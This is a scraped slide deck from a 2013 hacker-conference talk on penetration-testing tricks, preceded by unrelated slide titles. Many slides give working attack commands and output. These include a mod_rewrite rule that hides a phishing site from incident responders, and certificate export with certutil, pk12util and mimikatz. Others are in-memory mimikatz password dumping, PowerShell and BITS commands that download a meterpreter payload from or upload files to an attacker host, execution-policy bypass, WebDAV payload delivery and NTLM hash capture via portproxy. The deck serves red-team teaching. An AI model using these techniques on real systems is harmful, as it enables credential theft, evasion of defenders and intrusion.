Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 

hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2

  • 2.
  • 3. Whoami • Mubix “Rob” Fuller – mubix@metasploit.com – @mubix – room362.com – Co-Founder of NoVA Hackers • Previous Talks – Dirty Little Secrets – Networking for PenTesters – Metasploit Mastery – Deep Magic 101 – Couch to Career
  • 4. Whoami • Chris Gates (CG) – Twitter carnal0wnage – Blog carnal0wnage.attackresearch.com – Job Partner/Principal Security Consultant at Lares – NoVAHackers • Previous Talks – ColdFusion for Pentesters – From LOW to PWNED – Dirty Little Secrets 1 & 2 – Attacking Oracle (via web) – wXf Web eXploitation Framework – Open Source Information Gathering – Attacking Oracle (via TNS) – Client-Side Attacks
  • 5. Agenda • Putting in the hours on LinkedIn for SE • Giving IR teams a run for their money • Stealing certs • Become the proxy • Mimikatz with Metasploit • New Incognito && Netview release • Ditto • 10 ways to PSEXEC • Why doesn’t SYSTEM have proxy settings!?! • Windows is my backdoor (bitsadmin, powershell, wmi ) • WebDAV server via metasploit • Turning your External Pentest into an Internal one
  • 6. The setup… We like to use LinkedIn for OSINT but how can we do it better?
  • 7. Becoming a LiON • Why? • API is based on YOUR connections • 2nd == full names • 3rd level connections count but show more on Linkedin.com vs API • Creating a fake account • Connecting with Recruiters ++ • Connecting with “Open Networkers”
  • 9. LinkedIn API • URL: https://developer.linkedin.com • Allows you to query information – Company info – Groups – Name about your 1st & 2nd order connections
  • 10. Big Ass LinkedIn Network • Meet “John” • John has been busy being awesome on LinkedIn for the last few months
  • 11. LinkedIn API • Limited by YOUR connections and network reach • API gives you NO info about 3rd order connections • Usually you’ll see more info via the web on 3rd order people • The total number of search results possible for any search will vary depending on the user's account level.
  • 12. LinkedIn API • An example (Palantir) CG vs. John
  • 13. LinkedIn API • An example (Pfizer) CG vs. John
  • 14. LinkedIn API • An example (Bank of America) CG vs. John
  • 15. More LinkedIn • Turning an email list into validated LinkedIn Contacts/emails • Import them!
  • 16. More LinkedIn • Get some emails
  • 17. More LinkedIn • Import them! • Need them in a specific format though. – Ruby to the rescue
  • 19. More LinkedIn • Get some contacts
  • 20. More LinkedIn • Import and do your thing
  • 21. The setup… IR teams F**k up all my hard work preparing phishing attacks
  • 22. Phishing and F**king with IR Teams • Thanks to people like SANS organizations have a standardized, repeatable, process  – What’s not to like? – Submit to the sandbox – Submit to the malware lookup site – I feel safe! • But, sure does suck when you spend all that time setting up a phish only to have it ruined by this well tuned, standardized process…
  • 23. Phishing and F**king with IR Teams • What you *could* do… – Build a phish that EVERYONE will report – Capture the IR process via log/scan/analyst activity • This gives you intel on: – Which services are contracted out for analysis • And their IPs – Are humans in the mix • And their IPs – Level of sophistication
  • 24. Phishing and F**king with IR Teams • Once you know who’s coming to do analysis, we can send them to an alternate site and keep the users going to the phish site. • How?
  • 25. Phishing and F**king with IR Teams • Apache and mod-rewrite is an option RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^$ [OR] RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(HTTrack|clshttp|archiver|load er|email|nikto|miner|python|wget|Wget).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww- perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR] RewriteCond %{REMOTE_ADDR} ^188.168.16.164$ [OR] #outside IR RewriteCond %{REMOTE_ADDR} ^66.249.73.136$ [OR] #googlebot RewriteCond %{REMOTE_ADDR} ^88.88. [OR] RewriteRule ^(/.*) http://www.totallysafesite.com/$1 [R,L]
  • 26. The setup… I want to find and steal code signing certificates from victims
  • 27. Stealing Certificates • Why? • Have you tried to get/buy one? It’s a pain in the ass. – I see why people just steal them • Impact – Sign code as the company – Now your code may be *more* trusted by the victim…or at least less suspicious (ask Bit9) – Can you steal their wildcard SSL cert?
  • 28. Stealing Certificates • If you export one, it has to have a password  • However, if YOU export it, YOU can set the password. • You can do this all on the command line – Use mozilla’s certutil • http://www.mozilla.org/projects/security/pki/nss/tools /certutil.html – Use Mimikatz 
  • 29. Stealing Certificates • Mozilla certutil • Compile your own, or download precompiled bins certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.def ault-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u <------- code signer Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip--
  • 30. Stealing Certificates • Mozilla certutil • -L List all the certificates, or display information about a named certificate, in a certificate database. certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.defaul t-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip • “u”  Certificate can be used for authentication or signing  • http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
  • 31. Stealing Certificates • Mozilla pk12util.exe • To extract the cert: C:UsersCGDownloadsnss-3.10nss-3.10bin>pk12util.exe - n "Verified Publisher LLC's COMODO CA Limited ID" -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdh wru.default-1339854577637 -o test2.p12 -W mypassword1 • http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
  • 32. Stealing Certificates Via MimiKatz (list certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit‘ Process 3472 created. Channel 12 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 mimikatz(commandline) # exit
  • 33. Stealing Certificates Via MimiKatz (export certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit' Process 6112 created. Channel 23 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK mimikatz(commandline) # exit
  • 34. The setup… Ok… so we can steal their certificates what if we wanted to give them some of our own. ::evilgrin::
  • 35. Set up burp, get PortSwiggerCA
  • 38. You know what happens next…
  • 39. Side note… • Have to be “Admin” to do it  • This injects a Certificate Authority cert which means you can: – MITM HTTPS traffic (as demoed) – Use for 2nd stage phish or persistence – Issue code signing certs from your CA… • CAVEAT: There is a “remove_ca” module. Please don’t leave your clients with an extra CA in their certificate stores.. ;-)
  • 40. The setup… Mimikatz is awesome and I want to execute it without putting bins on the box
  • 41. Mimikatz gives me clear text passwords?
  • 43. Mimikatz • Mimikatz detected by AV • Sekurlsa.dll detected by AV • WCE detected by AV • WCE IN MEMORY! (kinda) Stop submitting $#!+ to Virus Total!
  • 44. Mimikatz • New version (6 Sep 12) supports in-memory • execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
  • 45.
  • 46. Sessiondump and Mimikatz Alpha 1. Dump lsass process memory from any system 2. Run mimikatz against dump 3. Open hat and collect free passwords
  • 47.
  • 48.
  • 49. The setup… Finding domain admin users is hard Incognito is awesome and I want to show/leverage the new features
  • 50. New Incognito (find_token) C:>find_token.exe usage: find_token.exe <server_name_or_ip> | -f <server_list_file> [username] [password]
  • 51. New Incognito (find_token) C:>find_token.exe dc1 [*] Scanning for logged on users... Server Name Username ------------------------------------------------------ dc1 PROJECTMENTORjdoe dc1 PROJECTMENTORjdoe
  • 53. NETVIEW C:Documents and SettingsuserDesktop>netview Netviewer Help -------------------------------------------------------------------- -d domain : Specifies a domain to pull a list of hosts from uses current domain if none specified -f filename.txt : Speficies a file to pull a list of hosts from -o filename.txt : Out to file instead of STDOUT
  • 54. Release of NETVIEW C:Documents and SettingsuserDesktop>netview -d [*] -d used without domain specifed - using current domain [+] Number of hosts: 3 [+] Host: DC1 Enumerating AD Info [+] DC1 - Comment - [+] DC1 - OS Version - 6.1 [+] DC1 - Domain Controller Enumerating IP Info [+] DC1 - IPv4 Address - 172.16.10.10 Enumerating Share Info [+] DC1 - Share - ADMIN$ Remote Admin [+] DC1 - Share - C$ Default share [+] DC1 - Share - IPC$ Remote IPC [+] DC1 - Share - NETLOGON Logon server share [+] DC1 - Share - SYSVOL Logon server share Enumerating Session Info [+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 Enumerating Logged-on Users [+] DC1 - Logged-on - PROJECTMENTORjdoe [+] DC1 - Logged-on - PROJECTMENTORjdoe [+] Host: WIN7X64 Enumerating AD Info [+] WIN7X64 - Comment - [+] WIN7X64 - OS Version - 6.1 Enumerating IP Info [+] WIN7X64 - IPv4 Address - 172.16.10.216 Enumerating Share Info [+] WIN7X64 - Share - ADMIN$ Remote Admin [+] WIN7X64 - Share - C$ Default share [+] WIN7X64 - Share - IPC$ Remote IPC Enumerating Session Info [+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 Enumerating Logged-on Users
  • 55. Release of NETVIEW AND IT’S ALREADY ON GITHUB:
  • 56. New features since last year… • Can now do LDAP to find hosts all the hosts in a domain, not just the ones your victim can see • Restricts the results from LDAP down to just computers that have been active in the last 90 days • Lists local user accounts for each system to include their description. Watch Eric’s talk later to see why this is important.
  • 57. The setup… Dropping binaries is a necessity sometimes, persistence for instance, but unless you name your bin SVCHOST.exe you don’t want it looking like:
  • 58. this:
  • 60. He does something really well…
  • 61. And it’s not just the icon…
  • 62. Yes, it’s already on Github too
  • 63. The setup… Who doesn’t want more ways to psexec??!!!
  • 64. 10 ways to PSEXEC
  • 65. Sysinternal PSEXEC POSITIVES • Never going to be on any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password • Leaves PSEXESVC running • Have to touch disk if not present already
  • 66. Metasploit PSEXEC POSITIVES • Supports the use of Hashes NEGATIVES • Some AVs flag service binary due to injection techniques used within • Rundll32.exe is running
  • 67. Metasploit PSEXEC-MOF POSITIVES • Drop a file and Windows automatically runs it. (MAGIC!) NEGATIVES • XP and below – (only because Metasploit doesn’t automatically compile MOFs) • ADMIN$ required – (Unless you make code edits)
  • 68. Metasploit PSEXEC-As-User POSITIVES • Executes as the current user • No need for passwords or hashes • Also a great way to bypass UAC.. But more on that later NEGATIVES • Some AVs flag service binary due to injection techniques used within • Rundll32.exe is running
  • 69. WMI POSITIVES • Never going to be on any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password
  • 70. Powershell POSITIVES • Never going to be on any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password
  • 71. RemCom POSITIVES • Open source psexec • You can add Pass-The- Hash – (open source an all) NEGATIVES • Binary, so again, can’t go over Metasploit sessions directly – portfwd Fu can still be used on a single IP • Runs as SYSTEM
  • 72. Winexe POSITIVES • Open source psexec • Supports Pass-The-Hash NEGATIVES • Binary, so again, can’t go over Metasploit sessions directly – portfwd Fu can still be used on a single IP • Runs as SYSTEM
  • 73. smbexec POSITIVES • Open source psexec • Supports Pass-The-Hash NEGATIVES • Binary – (but designed with shoveling over Metasploit in mind) http://sourceforge.net/projects/smbexec/
  • 74. Pass the hash for 15 years stuff here • Firefox • smbclient • smbmount • Rpcclient • http://passing-the-hash.blogspot.com/
  • 75. Zfasel’s stuff here • If it ever gets released works ;-) LOVE YOU FASEL!! Go see his talk, it works now… maybe…
  • 76. Python && impacket • http://code.google.com/p/impacket/ • PTH support for SMB/MSSQL/
  • 77. WinRM (‘new’ hotness) POSITIVES • Never going to be on any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password
  • 78. Do you look for 5985 internally on your pen tests? we would suggest it ;-) src: http://3.bp.blogspot.com/_nldKmk1qZaA/S2ahpNBS1BI/AAAAAAAAAy8/XrOxvP8B93M/s1600/winrm6.png
  • 79. Victim: winrm quickconfig –q Attacker: winrm quickconfig -q winrm set winrm/config/client @{AllowUnencrypted=“true”;TrustedHosts=“192.168.1.101”} Yes.. That’s right, THE ATTACKER says which hosts to trust… Sooooo much fun to be had! Oh, and did I mention it’s completely interactive? (You can enter password questions)
  • 80. WinRM is an HTTP services that looks for requests to the URL /wsman. A system that is doing so on port 80… on the Internet… in the Alexa Top 1 million… is sorta like listening on 445… just sayin…
  • 81. Metasploit PSEXEC-WinRM POSITIVES • Never going to be on any AV list • Uses powershell if possible • Executes binary as user specified, not as SYSTEM, so no Proxy concerns NEGATIVES • Need a Password – (or do you?)
  • 82. Build your own pyBear • PySMB supports auth with using hashes • Thanks Rel1k for the heads up on the library – but I’m not a good enough coder to get it working • Compile your own psexec with hash support • ;-) • Impacket (again)
  • 83. Build your own Bear.rb • Metasploit’s Rex library – already has the hash passing goodness – HDM committed a stand-alone version of PSEXEC on September 5th 2012
  • 84. The setup… UAC sucks… bypassing only takes 2 things…
  • 85. The setup… If you’re an admin and UAC is stopping you…
  • 86. Find a network with more than one Windows box…
  • 87. The setup… Why doesn’t SYSTEM have proxy settings !?!
  • 88. • If OS !> Vista – SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit) • WINDOWS/EXEC (or any of the other psexec methods we just talked about) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM AUTOSCRIPT http://wpad/wpad.dat “;” (or PAC) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM /MANUAL_PROXY 192.168.5.100:3128 “;” – After your done use NO_PROXY in place of AUTOSCRIPT or MANUAL_PROXY • Then MSF-PSEXEC to your heart’s content, SYSTEM will now use the proxy you’ve set.
  • 89. NETSH & ProxyCFG • Sets the WinHTTP proxy – Not Windows’ proxy settings, only is used if the program uses WinHTTP • XP – proxycfg –p 192.168.92.100:3128 – or – proxycfg –u (pulls it from IE) • Vista+ – netsh winhttp set proxy 192.168.92.100:3128 – or – netsh winhttp import proxy ie
  • 90. REGISTRY Poking • HKLMSoftwarePoliciesMicrosoftWindows CurrentVersionInternet Settings • ProxySettingsPerUser [DWORD] • Set to 0 for settings are System Wide • Set to 1 for settgings are Per User
  • 91. Registry Poking • Uses the DefaultConnectionSettings binary registry key. • Remote and/or different user setting
  • 92. The setup… Neat binaries that do backdoor/RAT behavior that are already there for us.
  • 93. Windows is my backdoor BITS “BITS is a file transfer service that provides a scriptable interface through Windows PowerShell. BITS transfers files asynchronously in the foreground or in the background. And, it automatically resumes file transfers after network disconnections and after a computer is restarted.” http://technet.microsoft.com/en-us/library/dd819415.aspx
  • 94. Windows is my backdoor BITS There are three types of BITS transfer jobs: - A download job downloads files to the client computer. - An upload job uploads a file to the server. - An upload-reply job uploads a file to the server and receives a reply file from the server application.
  • 95. Windows is my backdoor BITS (How-To) • Set the server side up (HTTP, not standard setup) – Google • Uses powershell to upload/download import BITS PS C:Userscg>Import-Module BitsTransfer Download files over BITS PS C:Userscg> Start-BitsTransfer http://192.168.26.128/upload/meterp443.exe C:UserscgDesktopmeterpdownload443.exe
  • 96. Windows is my backdoor BITS (How-To) Upload files over BITS PS C:Userscg> Start-BitsTransfer -Source C:UserscgDesktopfile2upload.txt -Destination http://192.168.26.128/upload/myfile.txt -transfertype upload
  • 97. Windows is my backdoor BITS over Wireshark
  • 98. Windows is my backdoor • Powershell • OMG Powershell!
  • 99. Windows is my backdoor • Powershell
  • 100. Windows is my backdoor • PowerShell – Does A LOT! – Check out Exploit Monday and PowerSploit – Chris @ ObscureSec – Carlos Perez has had lots of PowerShell blog posts – I haven't found a meterpreter feature that cant be done with PowerShell
  • 101. Windows is my backdoor • Powershell cool examples – Powershell hashdump (in SET) – Poweshell exec method in MSSQL_Payload – PowerSploit (syringe dll inject/shellcode exec ala PowerShell)
  • 102. Windows is my backdoor • Powershell cool examples • Port Scanner: PS C:> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.14",$_)) "$_ is open" } 2>$null 25 is open • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
  • 103. Windows is my backdoor • Powershell cool examples • Port Sweeper PS C:> 1..255 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null 10.1.1.5 • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
  • 104. Windows is my backdoor • Powershell cool examples • Bypass execution policy – Dave Kennedy talked about this at defcon 18 – Requires PowerShell v2.0 or above – powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden - File "C:do_neat_ps_shit.ps1"
  • 105. Windows is my backdoor • CreateCMD stuff from Dave Kennedy • In SET • Pshexec by Carlos Perez • https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb • B64 encodes the command so you can pass via meterp or in another script • powershell -noexit –EncodedCommand [b64enc BLOB]
  • 106. Windows is my backdoor • Metasploit to generate PowerShell • Uses old powersploit technique
  • 107. Windows is my backdoor • How to run PowerShell from Meterpreter – Use a bat file C:>type run_ps.bat powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden -File C:ipinfo2.ps1 Example: meterpreter > execute -H -f cmd.exe -a '/c C:runps.bat' Process 28536 created. meterpreter > [*] 4.5.6.21:3863 Request received for /vLNL... [*] 4.5.6.21:3863 Staging connection for target /vLNL received... --snip-- [*] Patched Communication Timeout at offset 653608... [*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
  • 108. The setup… A webdav server to download files from. Why? Because we can.
  • 110. MSF WebDAV server • net use ip:portdocuments /User:Guest • copy ip:portdocumentsmyexe.exe myexe.exe • Available on github: • https://github.com/carnal0wnage/Metasploit- Code/blob/master/modules/exploits/webdav_file_server.rb
  • 111. MSF WebDAV server msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents [*] 192.168.26.1:17870 PROPFIND => 301 (/documents) [*] 192.168.26.1:17870 PROPFIND /documents/ [*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/) [*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory [*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
  • 112. The Setup… LAN based attacks are instant wins on internal pentests, but difficult if not impossible to do on externals… or are they…
  • 113. While we are on the subject… Does anyone know what happens when you try to access a share on a windows box that doesn’t exist from another windows box?? I want to access SHARE3 I don’t have SHARE3 Is that it?
  • 114. nope (if webclient service is started – Vista+ manual start) I want to access SHARE3 I don’t have SHARE3 on SMB I want to access SHARE3 over WebDAV If you are following along at home, windows is always (unless disabled) listening on Port 445 (SMB) so an attacker can’t override it, but rarely have anything listening on port 80
  • 116. Meet the Microsoft Windows Firewall “PORTPROXY” feature Basically it’s port-forwarding but can do so for: IPv4 -> IPv4 IPv6 -> IPv4 IPv6 -> IPv6 IPv4 -> IPv6 In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
  • 117. Now convince/cause someone to connect to a fake share on VICTIM1…
  • 118. weeeeeeeeeeeeee • *] 50.50.50.50 http_ntlm - Request '/share3/test.png'... • [*] 50.50.50.50 http_ntlm - 2012-01-10 04:22:25 +0000 • NTLMv2 Response Captured from WIN7X86 • DOMAIN: PROJECTMENTOR USER: jadmin • LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled • NTHASH:9eed2162b1c7424780204fb9ced5bc1a NT_CLIENT_CHALLENGE:0101000000000000067a01b4 b097cd01c77c09ccedbfc55d0000000002001a0070007 2006f006a006500630074006d0065006e0074006f0072 000000000000000000
  • 119. why 1. Give me SHARE3! 5. OK, you are in my Intranet, AUTHAUTH 2. Portproxy! 6. AUTOAUTH! 3. AUTH! 7. kthxbai! 4. AUTH! via portpoxy And yes, SMB_Relay works just fine if you have a route set up over your meterpreter shell of the connect back. Oh, did I mention cross-protocol means you can go to the same host?! ;-)
  • 120. Respectfully refrained from any Inside->Out Google images. You’re welcome.